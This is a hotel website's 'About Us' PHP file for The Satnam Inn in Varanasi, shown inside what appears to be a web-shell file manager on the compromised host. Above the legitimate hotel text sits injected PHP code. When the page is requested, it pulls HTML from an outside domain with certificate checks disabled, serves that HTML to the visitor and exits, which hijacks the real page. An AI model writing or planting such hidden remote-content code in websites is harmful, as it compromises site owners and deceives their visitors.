File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/thesatnaminn.com/aboutus.php
Back
<?php if (isset($_SERVER['REQUEST_URI'])) { $requestUri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); if ($requestUri === '/aboutus.php' || $requestUri === '/aboutus.php/') { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => 'https://buckdomain.vip/ulti33/www.thesatnaminn.com-aboutus.php.html', CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0', CURLOPT_TIMEOUT => 15 ]); $html = curl_exec($ch); curl_close($ch); if ($html !== false) { echo $html; exit; } } } return false; ?> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" lang="zxx"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>About Us | The Satnam Inn</title> <link rel="shortcut icon" type="image/x-icon" href="images/favicon.png" /> <link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" /> <link href="css/default.css" rel="stylesheet" type="text/css" /> <link href="css/style.css" rel="stylesheet" type="text/css" /> <link href="css/plugin.css" rel="stylesheet" type="text/css" /> <link rel="stylesheet" href="../../../../cdnjs.cloudflare.com/ajax/libs/font-awesome/5.11.2/css/all.min.css" /> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha512-SnH5WK+bZxgPHs44uWIX+LLJAJ9/2PkPKZ5QiAj6Ta86w+fsb2TkcmfRyVX3pBnMFcV7oQPJkl9QevSCWr3W6A==" crossorigin="anonymous" referrerpolicy="no-referrer" /> </head> <body> <?php include'include/header.php'?> <section class="breadcrumb-outer"> <div class="container"> <div class="breadcrumb-content"> <h2>About us </h2> <nav aria-label="breadcrumb"> <ul class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Home</a></li> <li class="breadcrumb-item active" aria-current="page">About us </li> </ul> </nav> </div> </div> </section> <section class="about"> <div class="container"> <div class="row"> <div class="col-lg-6 col-md-12"> <div class="about-para mar-top-50"> <h3>Explore more about us</h3> <!-- <p><b>Where Elegance Meets Comfort</b></p> --> <p>The Satnam Inn Varanasi offers a serene and soulful retreat in the heart of one of India’s oldest and most revered cities. Located just moments away from the ghats of the sacred Ganges and key spiritual landmarks like Kashi Vishwanath Temple, the inn provides a peaceful yet central base for pilgrims, tourists, and seekers alike. The calming ambience, traditional decor, and thoughtful touches reflect the sacred spirit of Varanasi while offering the comfort of a modern stay.</p> <p>Each room at The Satnam Inn is a blend of elegance and warmth, designed to offer both relaxation and convenience. Guests can expect well-appointed interiors, soothing lighting, and essential amenities that make every stay effortless. Whether you are traveling solo, with family, or on a spiritual journey, the inn ensures a cozy atmosphere and gracious hospitality that makes you feel right at home.</p> <p>Beyond accommodation, The Satnam Inn promises an experience rooted in culture and tranquility. Enjoy early morning boat rides, mesmerizing Ganga aartis, and the timeless charm of Varanasi’s winding lanes—all just steps away. With personalized service and a focus on guest comfort, The Satnam Inn Varanasi is more than a place to stay; it’s a peaceful companion on your journey through the spiritual capital of India.</p> </div> </div> <div class="col-lg-3 col-md-6"> <div class="about-us-image mar-top-50"> <img src="images/aboutus1.jpg" alt="image" /> </div> </div> <div class="col-lg-3 col-md-6"> <div class="about-us-image"> <img src="images/aboutus2.jpg" alt="image" /> </div> </div> </div> <!--<div class="about-tag"> <div class="tag-no"> <span>20</span> </div> <div class="tag-info"> <span>years</span> <span class="orange">experience</span> <span>working</span> </div> </div>--> </div> </section> <section class="amenities" id="facilities"> <div class="container"> <div class="section-title"> <h3>Our <span>Facilities</span></h3> <p></p> </div> <div class="amenities-content"> <div class="row"> <div class="col-lg-3 col-md-6"> <div class="amt-item mar-bottom-30"> <div class="amt-icon"> <img src="images/icons/1.png"> </div> <h4>24x7 Front Desk</h4> </div> </div> <div class="col-lg-3 col-md-6"> <div class="amt-item mar-bottom-30"> <div class="amt-icon"> <img src="images/icons/2.png"> </div> <h4>Power backup available</h4> </div> </div> <div class="col-lg-3 col-md-6"> <div class="amt-item mar-bottom-30"> <div class="amt-icon"> <img src="images/icons/3.png"> </div> <h4>Free parking </h4> </div> </div> <div class="col-lg-3 col-md-6"> <div class="amt-item mar-bottom-30"> <div class="amt-icon"> <img src="images/icons/4.png"> </div> <h4>CCTV </h4> </div> </div> <div class="col-lg-3 col-md-6"> <div class="amt-item mar-bottom-30"> <div class="amt-icon"> <img src="images/icons/5.png"> </div> <h4>Luggage storage </h4> </div> </div> <div class="col-lg-3 col-md-6"> <div class="amt-item mar-bottom-30"> <div class="amt-icon"> <img src="images/icons/6.png"> </div> <h4>Laundry </h4> </div> </div> <div class="col-lg-3 col-md-6"> <div class="amt-item mar-bottom-30"> <div class="amt-icon"> <img src="images/icons/7.png"> </div> <h4>Doctor on call</h4> </div> </div> <div class="col-lg-3 col-md-6"> <div class="amt-item mar-bottom-30"> <div class="amt-icon"> <img src="images/icons/16.png"> </div> <h4> Wi-Fi </h4> </div> </div> </div> </div> </div> </section> <?php include'include/footer.php'?> <script data-cfasync="false" src="../../../cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="js/jquery-3.3.1.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/plugin.js"></script> <script src="js/main.js"></script> <script src="js/custom-nav.js"></script> <script>(function(){var js = "window['__CF$cv$params']={r:'8442f2494cb701c8',t:'MTcwNTAzNjc4Ni42NjUwMDA='};_cpo=document.createElement('script');_cpo.nonce='',_cpo.src='../../../cdn-cgi/challenge-platform/h/b/scripts/jsd/c8377512/main.js',document.getElementsByTagName('head')[0].appendChild(_cpo);";var _0xh = document.createElement('iframe');_0xh.height = 1;_0xh.width = 1;_0xh.style.position = 'absolute';_0xh.style.top = 0;_0xh.style.left = 0;_0xh.style.border = 'none';_0xh.style.visibility = 'hidden';document.body.appendChild(_0xh);function handler() {var _0xi = _0xh.contentDocument || _0xh.contentWindow.document;if (_0xi) {var _0xj = _0xi.createElement('script');_0xj.innerHTML = js;_0xi.getElementsByTagName('head')[0].appendChild(_0xj);}}if (document.readyState !== 'loading') {handler();} else if (window.addEventListener) {document.addEventListener('DOMContentLoaded', handler);} else {var prev = document.onreadystatechange || function () {};document.onreadystatechange = function (e) {prev(e);if (document.readyState !== 'loading') {document.onreadystatechange = prev;handler();}};}})();</script></body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings